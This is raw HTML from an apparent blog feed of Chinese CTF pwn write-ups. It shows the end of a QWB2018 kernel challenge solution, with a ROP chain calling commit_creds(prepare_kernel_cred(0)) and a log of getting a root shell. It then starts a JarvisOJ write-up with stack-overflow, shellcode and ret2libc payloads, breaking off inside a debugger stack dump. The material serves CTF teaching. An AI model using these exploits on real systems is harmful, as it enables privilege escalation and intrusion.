class="p">);</span> <span class="n">size_t</span> <span class="n">rop</span><span class="p">[</span><span class="mh">0x1000</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span><span class="mi">0</span><span class="p">};</span> <span class="kt">int</span> <span class="n">i</span><span class="p">;</span> <span class="k">for</span><span class="p">(</span><span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="mi">10</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span> <span class="n">rop</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">=</span> <span class="n">canary</span><span class="p">;</span> <span class="p">}</span> <span class="n">rop</span><span class="p">[</span><span class="n">i</span><span class="o">++</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0xffffffff81000b2f</span> <span class="o">+</span> <span class="n">offset</span><span class="p">;</span> <span class="c1">// pop rdi; ret </span><span class="c1"></span> <span class="n">rop</span><span class="p">[</span><span class="n">i</span><span class="o">++</span><span class="p">]</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">rop</span><span class="p">[</span><span class="n">i</span><span class="o">++</span><span class="p">]</span> <span class="o">=</span> <span class="n">prepare_kernel_cred</span><span class="p">;</span> <span class="c1">// prepare_kernel_cred(0) </span><span class="c1"></span> <span class="n">rop</span><span class="p">[</span><span class="n">i</span><span class="o">++</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0xffffffff810a0f49</span> <span class="o">+</span> <span class="n">offset</span><span class="p">;</span> <span class="c1">// pop rdx; ret </span><span class="c1"></span> <span class="n">rop</span><span class="p">[</span><span class="n">i</span><span class="o">++</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0xffffffff81021e53</span> <span class="o">+</span> <span class="n">offset</span><span class="p">;</span> <span class="c1">// pop rcx; ret </span><span class="c1"></span> <span class="n">rop</span><span class="p">[</span><span class="n">i</span><span class="o">++</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0xffffffff8101aa6a</span> <span class="o">+</span> <span class="n">offset</span><span class="p">;</span> <span class="c1">// mov rdi, rax; call rdx; </span><span class="c1"></span> <span class="n">rop</span><span class="p">[</span><span class="n">i</span><span class="o">++</span><span class="p">]</span> <span class="o">=</span> <span class="n">commit_creds</span><span class="p">;</span> <span class="n">rop</span><span class="p">[</span><span class="n">i</span><span class="o">++</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0xffffffff81a012da</span> <span class="o">+</span> <span class="n">offset</span><span class="p">;</span> <span class="c1">// swapgs; popfq; ret </span><span class="c1"></span> <span class="n">rop</span><span class="p">[</span><span class="n">i</span><span class="o">++</span><span class="p">]</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">rop</span><span class="p">[</span><span class="n">i</span><span class="o">++</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0xffffffff81050ac2</span> <span class="o">+</span> <span class="n">offset</span><span class="p">;</span> <span class="c1">// iretq; ret; </span><span class="c1"></span> <span class="n">rop</span><span class="p">[</span><span class="n">i</span><span class="o">++</span><span class="p">]</span> <span class="o">=</span> <span class="p">(</span><span class="n">size_t</span><span class="p">)</span><span class="n">spawn_shell</span><span class="p">;</span> <span class="c1">// rip </span><span class="c1"></span> <span class="n">rop</span><span class="p">[</span><span class="n">i</span><span class="o">++</span><span class="p">]</span> <span class="o">=</span> <span class="n">user_cs</span><span class="p">;</span> <span class="n">rop</span><span class="p">[</span><span class="n">i</span><span class="o">++</span><span class="p">]</span> <span class="o">=</span> <span class="n">user_rflags</span><span class="p">;</span> <span class="n">rop</span><span class="p">[</span><span class="n">i</span><span class="o">++</span><span class="p">]</span> <span class="o">=</span> <span class="n">user_sp</span><span class="p">;</span> <span class="n">rop</span><span class="p">[</span><span class="n">i</span><span class="o">++</span><span class="p">]</span> <span class="o">=</span> <span class="n">user_ss</span><span class="p">;</span> <span class="n">write</span><span class="p">(</span><span class="n">fd</span><span class="p">,</span> <span class="n">rop</span><span class="p">,</span> <span class="mh">0x800</span><span class="p">);</span> <span class="n">core_copy_func</span><span class="p">(</span><span class="n">fd</span><span class="p">,</span> <span class="mh">0xffffffffffff0000</span> <span class="o">|</span> <span class="p">(</span><span class="mh">0x100</span><span class="p">));</span> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> <span class="p">}</span> </code></pre></td></tr></table> </div> </div><h4 id="get-root-shell-1">get root shell</h4> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash">QWB2018_core <span class="o">[</span>master●●<span class="o">]</span> gcc exploit.c -static -masm<span class="o">=</span>intel -g -o exploit // 如果使用 intel 汇编需要加上 -masm<span class="o">=</span>intel QWB2018_core <span class="o">[</span>master●●<span class="o">]</span> cp exploit give_to_player/core/tmp cp：是否覆盖<span class="s1">&#39;give_to_player/core/tmp/exploit&#39;</span>？ y QWB2018_core <span class="o">[</span>master●●<span class="o">]</span> <span class="nb">cd</span> give_to_player/core core <span class="o">[</span>master●●<span class="o">]</span> ./gen_cpio.sh core.cpio . ./usr ./usr/sbin ...... ...... core <span class="o">[</span>master●●<span class="o">]</span> mv core.cpio .. mv：是否覆盖<span class="s1">&#39;../core.cpio&#39;</span>？ y core <span class="o">[</span>master●●<span class="o">]</span> <span class="nb">cd</span> .. give_to_player <span class="o">[</span>master●●<span class="o">]</span> ./start.sh / $ ls /tmp/ exploit kallsyms / $ id <span class="nv">uid</span><span class="o">=</span>1000<span class="o">(</span>chal<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>1000<span class="o">(</span>chal<span class="o">)</span> <span class="nv">groups</span><span class="o">=</span>1000<span class="o">(</span>chal<span class="o">)</span> / $ /tmp/exploit <span class="o">[</span>*<span class="o">]</span>status has been saved. commit_creds addr: 0xffffffffbd09c8e0 vmlinux_base addr: 0xffffffffbd000000 prepare_kernel_cred addr: 0xffffffffbd09cce0 <span class="o">[</span>*<span class="o">]</span><span class="nb">set</span> off to <span class="m">64</span> <span class="o">[</span>*<span class="o">]</span><span class="nb">read</span> to buf. <span class="o">[</span>+<span class="o">]</span>canary: 0x6be486f377bb8600 <span class="o">[</span>*<span class="o">]</span>copy from user with size: -65280 / <span class="c1"># id</span> <span class="nv">uid</span><span class="o">=</span>0<span class="o">(</span>root<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>0<span class="o">(</span>root<span class="o">)</span> </code></pre></td></tr></table> </div> </div><p>当然这个题目也有其他做法，下篇再分析。</p> <h2 id="reference-and-thanks-to">Reference and Thanks to</h2> <p>Linux Manual Pages</p> <p><a href="https://zh.wikipedia.org/wiki/">https://zh.wikipedia.org/wiki/</a>内核</p> <p><a href="https://zh.wikipedia.org/wiki/">https://zh.wikipedia.org/wiki/</a>分级保护域</p> <p><a href="https://www.anquanke.com/post/id/86490">https://www.anquanke.com/post/id/86490</a></p> <p><a href="https://zh.wikipedia.org/wiki/Ioctl">https://zh.wikipedia.org/wiki/Ioctl</a></p> <p><a href="http://www.freebuf.com/articles/system/54263.html">http://www.freebuf.com/articles/system/54263.html</a></p> <p><a href="https://blog.csdn.net/zqixiao_09/article/details/50839042">https://blog.csdn.net/zqixiao_09/article/details/50839042</a></p> <p><a href="https://bbs.pediy.com/thread-247054.htm">https://bbs.pediy.com/thread-247054.htm</a></p> <p><a href="https://yq.aliyun.com/articles/53679">https://yq.aliyun.com/articles/53679</a></p> <p><a href="https://whereisk0shl.top/NCSTISC%20Linux%20Kernel%20pwn450%20writeup.html">https://whereisk0shl.top/NCSTISC%20Linux%20Kernel%20pwn450%20writeup.html</a></p> <p><a href="https://code.woboq.org/linux/linux/include/linux/cred.h.html#cred">https://code.woboq.org/linux/linux/include/linux/cred.h.html#cred</a></p> <p><a href="https://elixir.bootlin.com/linux/v4.4.72/source/include/linux/cred.h#L118">https://elixir.bootlin.com/linux/v4.4.72/source/include/linux/cred.h#L118</a></p> <p><a href="http://muhe.live/2017/07/13/babydriver-writeup/">http://muhe.live/2017/07/13/babydriver-writeup/</a></p> <p><a href="https://xz.aliyun.com/t/2306">https://xz.aliyun.com/t/2306</a></p> <p><a href="https://unix.stackexchange.com/questions/5518/what-is-the-difference-between-the-following-kernel-makefile-terms-vmlinux-vml">https://unix.stackexchange.com/questions/5518/what-is-the-difference-between-the-following-kernel-makefile-terms-vmlinux-vml</a></p> <p><a href="https://blog.csdn.net/gatieme/article/details/78311841">https://blog.csdn.net/gatieme/article/details/78311841</a></p> <p><a href="https://veritas501.space/2018/06/05/qwb2018%20core/">https://veritas501.space/2018/06/05/qwb2018%20core/</a></p> <p><a href="http://blog.vmsplice.net/2011/09/how-to-share-files-instantly-between.html">http://blog.vmsplice.net/2011/09/how-to-share-files-instantly-between.html</a></p> https://bash-c.github.io/post/jarvisoj-pwn-writeup/ Sun, 16 Sep 2018 22:09:27 +0800 https://bash-c.github.io/post/jarvisoj-pwn-writeup/ <h1 id="jarvisoj-all-pwn-writeup">JarvisOJ-all-pwn-Writeup</h1> <p>解决了 <a href="https://www.jarvisoj.com/login">jarvisOJ</a> 至今 （2018.9.19）的所有 pwn 题目，分享一下 writeup。做题目的过程中参考了很多师傅的 writeup，在 Reference 中贴出了师傅们的博客，感谢师傅们的分享。</p> <p>题目较多，对于网上有较多 writeup 的题目，不再详细分析，只列出思路；着重分析 writeup 较少的题目。</p> <h2 id="xmanlevel0-50">[XMAN]level0 (50)</h2> <p>最简单的栈溢出，给了能直接拿 shell 的函数，覆盖返回地址为该函数地址即可</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-fallback" data-lang="fallback">+----------+ |........ | |padding | |........ | | | +----------+ |padding | &lt;- rbp +----------+ |callsystem| &lt;- ret addr +----------+ </code></pre></td></tr></table> </div> </div><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-python" data-lang="python"><span class="n">payload</span> <span class="o">=</span> <span class="s1">&#39;0&#39;</span> <span class="o">*</span> <span class="p">(</span><span class="mh">0x80</span> <span class="o">+</span> <span class="mh">0x8</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">ELF</span><span class="p">(</span><span class="s2">&#34;./level0&#34;</span><span class="p">)</span><span class="o">.</span><span class="n">sym</span><span class="p">[</span><span class="s1">&#39;callsystem&#39;</span><span class="p">])</span> </code></pre></td></tr></table> </div> </div><p><a href="https://github.com/bash-c/pwn_repo/blob/master/jarvisOJ_level0/solve.py">exploit here</a></p> <h2 id="tell-me-something-100">Tell Me Something (100)</h2> <p>与上一题几乎完全一样，不再分析</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-python" data-lang="python"><span class="n">payload</span> <span class="o">=</span> <span class="s1">&#39;0&#39;</span> <span class="o">*</span> <span class="p">(</span><span class="mh">0x80</span> <span class="o">+</span> <span class="mh">0x8</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">ELF</span><span class="p">(</span><span class="s2">&#34;./guestbook&#34;</span><span class="p">)</span><span class="o">.</span><span class="n">sym</span><span class="p">[</span><span class="s1">&#39;good_game&#39;</span><span class="p">])</span> </code></pre></td></tr></table> </div> </div><p><a href="https://github.com/bash-c/pwn_repo/blob/master/jarvisOJ_Tell_Me_Something/solve.py">exploit here</a></p> <h2 id="xmanlevel1-100">[XMAN]level1 (100)</h2> <p>有栈溢出漏洞，没有开 NX 保护，因此可以用 shellcode</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-fallback" data-lang="fallback">+----------+ |shellcode | &lt;-----------+ |shellcode | | |........ | | |junk data | | |........ | | | | | +----------+ | |junk data | &lt;- ebp | +----------+ | |buf addr | &lt;- ret add -+ +----------+ </code></pre></td></tr></table> </div> </div><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-python" data-lang="python"><span class="n">payload</span> <span class="o">=</span> <span class="n">asm</span><span class="p">(</span><span class="n">shellcraft</span><span class="o">.</span><span class="n">sh</span><span class="p">())</span><span class="o">.</span><span class="n">ljust</span><span class="p">(</span><span class="mh">0x88</span> <span class="o">+</span> <span class="mh">0x4</span><span class="p">,</span> <span class="s1">&#39;</span><span class="se">\0</span><span class="s1">&#39;</span><span class="p">)</span> <span class="o">+</span> <span class="n">p32</span><span class="p">(</span><span class="n">buf_addr</span><span class="p">)</span> </code></pre></td></tr></table> </div> </div><p><a href="https://github.com/bash-c/pwn_repo/blob/master/jarvisOJ_level1/solve.py">exploit here</a></p> <h2 id="xmanlevel2-150">[XMAN]level2 (150)</h2> <p>存在栈溢出，程序中有 <strong>system</strong> 函数 和 <strong>/bin/sh</strong> 字符串，根据函数调用约定，32 位程序函数的参数是放在栈上的，因此可以通过伪造一个调用 <strong>system(&quot;/bin/sh&rdquo;)</strong> 的栈结构来 get shell</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-fallback" data-lang="fallback">+---------------+ |padding | |....... | | | | | | | +---------------+ |padding | &lt;- ebp +---------------+ |system addr | &lt;- ret addr +---------------+ |junk data | &lt;- system ret +---------------+ |/bin/sh addr | +---------------+ </code></pre></td></tr></table> </div> </div><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-python" data-lang="python"><span class="n">payload</span> <span class="o">=</span> <span class="n">flat</span><span class="p">(</span><span class="n">cyclic</span><span class="p">(</span><span class="mh">0x88</span> <span class="o">+</span> <span class="mi">4</span><span class="p">),</span> <span class="n">elf</span><span class="o">.</span><span class="n">sym</span><span class="p">[</span><span class="s1">&#39;system&#39;</span><span class="p">],</span> <span class="s1">&#39;aaaa&#39;</span><span class="p">,</span> <span class="nb">next</span><span class="p">(</span><span class="n">elf</span><span class="o">.</span><span class="n">search</span><span class="p">(</span><span class="s2">&#34;/bin/sh&#34;</span><span class="p">)))</span> <span class="c1"># 此时程序运行流程为 vulnerable_function -&gt; system(&#34;/bin/sh&#34;) -&gt; junk data，因为我们已经执行了 system(&#34;/bin/sh&#34;)，因此 system(&#34;/bin/sh&#34;) 的返回地址（即 junk data 可以随便指定）</span> </code></pre></td></tr></table> </div> </div><p><a href="https://github.com/bash-c/pwn_repo/blob/master/jarvisOJ_level2/solve.py">exploit here</a></p> <h2 id="typo-150">Typo (150)</h2> <p>这道题目特殊在程序是 arm 架构的，但其实只是一个简单的 rop，把环境搭建好后并不难。</p> <p>我在另一篇博文中以这道题目为例分析了 arm 的 pwn，包括了运行和调试的环境搭建，以及恢复符号，<a href="http://m4x.fun/post/how-2-pwn-an-arm-binary/">链接</a>。</p> <p><a href="https://github.com/bash-c/pwn_repo/blob/master/jarvisOJ_typo/solve.py">exploit here</a></p> <h2 id="xmanlevel2_x64-200">[XMAN]level2_x64 (200)</h2> <p>与 level2 相比思路基本一致，不同的是这道题目是 64 位的，64 位与 32 位的传参规则不同，需要用到 rop 控制寄存器，网上有很多分析 rop 的文章，这里就不介绍了。</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-fallback" data-lang="fallback">+--------------+ |padding | |...... | | | | | | | +--------------+ |padding | &lt;- rbp +--------------+ |prdi addr | &lt;- ret addr +--------------+ |/bin/sh addr | +--------------+ |system addr | +--------------+ </code></pre></td></tr></table> </div> </div><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-python" data-lang="python"><span class="n">payload</span> <span class="o">=</span> <span class="n">flat</span><span class="p">(</span><span class="n">cyclic</span><span class="p">(</span><span class="mh">0x88</span><span class="p">),</span> <span class="n">prdi</span><span class="p">,</span> <span class="nb">next</span><span class="p">(</span><span class="n">elf</span><span class="o">.</span><span class="n">search</span><span class="p">(</span><span class="s2">&#34;/bin/sh&#34;</span><span class="p">)),</span> <span class="n">elf</span><span class="o">.</span><span class="n">sym</span><span class="p">[</span><span class="s1">&#39;system&#39;</span><span class="p">])</span> </code></pre></td></tr></table> </div> </div><p><a href="https://github.com/bash-c/pwn_repo/blob/master/jarvisOJ_level2_x64/solve.py">exploit here</a></p> <h2 id="xmanlevel3-200">[XMAN]level3 (200)</h2> <p>标准的 ret2libc，先通过 rop 控制 puts 出某个 GOT 中的地址以找到 libc 的基址（elf 的延迟绑定网上也有很多分析的文章，这里也不介绍了），有了 libc 的基地址后，libc 中的所有函数和字符串的地址就知道了，构造一个 <strong>system(&quot;/bin/sh&rdquo;)</strong> 的函数调用栈即可</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-fallback" data-lang="fallback">+-----------+ |padding | |...... | | | | | +-----------+ |padding | &lt;- ebp +-----------+ |write@plt | &lt;- ret addr +-----------+ |_start addr| # write(1, write@got, 4) -&gt; _start +-----------+ |1 | +-----------+ |write@got | +-----------+ |4 | +-----------+ +-----------+ |padding | |...... | | | +-----------+ |padding | &lt;- ebp +-----------+ |system | &lt;- ret addr +-----------+- |junk data | # system(&#34;/bin/sh&#34;) -&gt; junk data +-----------+ |/bin/sh addr +-----------+ </code></pre></td></tr></table> </div> </div><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-python" data-lang="python"><span class="n">leak</span> <span class="o">=</span> <span class="n">flat</span><span class="p">(</span><span class="n">cyclic</span><span class="p">(</span><span class="mh">0x88</span> <span class="o">+</span> <span class="mi">4</span><span class="p">),</span> <span class="n">elf</span><span class="o">.</span><span class="n">plt</span><span class="p">[</span><span class="s1">&#39;write&#39;</span><span class="p">],</span> <span class="n">elf</span><span class="o">.</span><span class="n">sym</span><span class="p">[</span><span class="s1">&#39;_start&#39;</span><span class="p">],</span> <span class="mi">1</span><span class="p">,</span> <span class="n">elf</span><span class="o">.</span><span class="n">got</span><span class="p">[</span><span class="s1">&#39;write&#39;</span><span class="p">],</span> <span class="mi">4</span><span class="p">)</span> <span class="n">rop</span> <span class="o">=</span> <span class="n">flat</span><span class="p">(</span><span class="n">cyclic</span><span class="p">(</span><span class="mh">0x88</span> <span class="o">+</span> <span class="mi">4</span><span class="p">),</span> <span class="n">libc</span><span class="o">.</span><span class="n">sym</span><span class="p">[</span><span class="s1">&#39;system&#39;</span><span class="p">],</span> <span class="s1">&#39;aaaa&#39;</span><span class="p">,</span> <span class="nb">next</span><span class="p">(</span><span class="n">libc</span><span class="o">.</span><span class="n">search</span><span class="p">(</span><span class="s2">&#34;/bin/sh&#34;</span><span class="p">)))</span> </code></pre></td></tr></table> </div> </div><p>新手容易犯的一个错误是本地和远程的 libc 混用，不同版本的 libc 函数的偏移一般不同，所以本地测试和远程需要使用对应的 libc，本地调试时可以通过 <code>LD_PRELOAD=./libc_path ./binary</code> 来指定 libc（版本相差过大时可能会出错）</p> <p><a href="https://github.com/bash-c/pwn_repo/blob/master/jarvisOJ_level3/solve.py">exploit here</a></p> <h2 id="smashes-200">Smashes (200)</h2> <p>ssp 攻击，大致原理是覆盖 __libc_argv[0]，触发栈溢出，通过报错来 leak 某些信息。<a href="https://veritas501.space/2017/04/28/%E8%AE%BAcanary%E7%9A%84%E5%87%A0%E7%A7%8D%E7%8E%A9%E6%B3%95/">veritas501</a> 师傅对这种方法做过很优秀的分析。</p> <p>通过调试可以快速确定覆盖所需的偏移量以及重映射后 flag 的地址</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-asm" data-lang="asm"><span class="nf">pwndbg</span><span class="err">&gt;</span> <span class="no">stack</span> <span class="mi">50</span> <span class="err">00:0000│</span> <span class="nf">rax</span> <span class="no">rsp</span> <span class="no">rdi-1</span> <span class="mi">0x7fffffffddd0</span> <span class="err">◂—</span> <span class="mi">0x31313131313131</span> <span class="err">/</span><span class="p">*</span> <span class="no">u</span><span class="err">&#39;</span><span class="mi">1111111</span><span class="err">&#39;</span> <span class="p">*</span><span class="err">/</span> <span class="err">01:0008│</span> <span class="err">0</span><span class="nf">x7fffffffddd8</span> <span class="err">◂—</span> <span class="mi">0x0</span> <span class="na">...</span> <span class="err">↓</span> <span class="err">15:00</span><span class="nf">a8</span><span class="err">│</span> <span class="mi">0x7fffffffde78</span> <span class="err">—▸</span> <span class="mi">0x7ffff7dd3760</span> <span class="p">(</span><span class="no">_IO_2_1_stdout_</span><span class="p">)</span> <span class="err">◂—</span> <span class="mi">0xfbad2887</span> <span class="err">16:00</span><span class="nf">b0</span><span class="err">│</span> <span class="mi">0x7fffffffde80</span> <span class="err">◂—</span> <span class="mi">0x0</span> <span class="err">17:00</span><span class="nf">b8</span><span class="err">│</span> <span class="mi">0x7fffffffde88</span> <span class="err">—▸</span> <span class="mi">0x7ffff7a99b82</span> <span class="p">(</span><span class="no">_IO_default_setbuf</span><span class="err">+</span><span class="mi">66</span><span class="p">)</span> <span class="err">◂—</span> <span class="no">cmp</span> <span class="no">eax</span><span class="p">,</span> <span class="p">-</span><span class="mi">1</span> <span class="err">18:00</span><span class="nf">c0</span><span class="err">│</span> <span class="mi">0x7fffffffde90</span> <span class="err">◂—</span> <span class="mi">0x0</span> <span class="err">19:00</span><span class="nf">c8</span><span class="err">│</span> <span class="mi">0x7fffffffde98</span> <span class="err">—▸</span> <span class="mi">0x7ffff7dd3760</span> <span class="p">(</span><span class="no">_IO_2_1_stdout_</span><span class="p">)</span> <span class="err">◂—</span> <span class="mi">0xfbad2887</span> <span class="err">1</span><span class="nl">a:</span><span class="err">00</span><span class="nf">d0</span><span class="err">│</span> <span class="mi">0x7fffffffdea0</span> <span class="err">◂—</span> <span class="mi">0x0</span> <span class="na">...</span> <span class="err">↓</span> <span class="err">1</span><span class="nl">c:</span><span class="err">00</span><span class="nf">e0</span><span class="err">│</span> <span class="mi">0x7fffffffdeb0</span> <span class="err">—▸</span> <span class="mi">0x7ffff7dcf2a0</span> <span class="p">(</span><span class="no">_IO_file_jumps</span><span class="p">)</span> <span class="err">◂—</span> <span class="mi">0x0</span> <span class="err">1</span><span class="nl">d:</span><span class="err">00</span><span class="nf">e8</span><span class="err">│</span> <span class="mi">0x7fffffffdeb8</span> <span class="err">—▸</span> <span class="mi">0x7ffff7a966f9</span> <span class="p">(</span><span class="no">_IO_file_setbuf</span><span class="err">+</span><span class="mi">9</span><span class="p">)</span> <span class="err">◂—</span> <span class="no">test</span> <span class="no">rax</span><span class="p">,</span> <span class="no">rax</span> <span class="err">1</span><span class="nl">e:</span><span class="err">00</span><span class="nf">f0</span><span class="err">│</span> <span class="mi">0x7fffffffdec0</span> <span class="err">—▸</span> <span class="mi">0x7ffff7dd3760</span> <span class="p">(</span><span class="no">_IO_2_1_stdout_</span><span class="p">)</span> <span class="err">◂—</span> <span class="mi">0xfbad2887</span> <span class="err">1</span><span class="nl">f:</span><span class="err">00</span><span class="nf">f8</span><span class="err">│</span> <span class="mi">0x7fffffffdec8</span> <span class="err">—▸</span> <span class="mi">0x7ffff7a8dc37</span> <span class="p">(</span><span class="no">setbuffer</span><span class="err">+</span><span class="mi">231</span><span class="p">)</span> <span class="err">◂—</span> <span class="no">test</span> <span class="no">dword</span> <span class="no">ptr</span> <span class="p">[</span><span class="no">rbx</span><span class="p">],</span> <span class="mi">0x8000</span> <span class="err">20:0100│</span> <span class="err">0</span><span class="nf">x7fffffffded0</span> <span class="err">—▸</span> <span class="mi">0x7ffff7de70e0</span> <span class="p">(</span><span class="no">_dl_fini</span><span class="p">)</span> <span class="err">◂—</span> <span class="no">push</span> <span class="no">rbp</span> <span class="err">21:0108│</span> <span class="err">0</span><span class="nf">x7fffffffded8</span> <span class="err">◂—</span> <span class="mi">0xe2daa1a4cd530600</span> <span class="err">22:0110│</span> <span class="err">0</span><span class="nf">x7fffffffdee0</span> <span class="err">—▸</span> <span class="mi">0x4008b0</span> <span class="err">◂—</span> <span class="no">push</span> <span class="no">r15</span> <span class="err">23:0118│</span> <span class="err">0</span><span class="nf">x7fffffffdee8</span> <span class="err">◂—</span> <span class="mi">0x0</span> <span class="err">24:0120│</span> <span class="err">0</span><span class="nf">x7fffffffdef0</span> <span class="err">—▸</span> <span class="mi">0x4008b0</span> <span class="err">◂—</span> <span class="no">push</span> <span class="no">r15</span> <span class="err">25:0128│</span> <span class="err">0</span><span class="nf">x7fffffffdef8</span> <span class="err">—▸</span> <span class="mi">0x4006e7</span> <span class="err">◂—</span> <span class="no">xor</span> <span class="no">eax</span><span class="p">,</span> <span class="no">eax</span> <span class="err">26:0130│</span> <span class="err">0</span><span class="nf">x7fffffffdf00</span> <span class="err">◂—</span> <span class="mi">0x0</span> <span class="err">27:0138│</span> <span class="err">0</span><span class="nf">x7fffffffdf08</span> <span class="err">—▸</span> <span class="mi">0x7ffff7a3fa87</span> <span 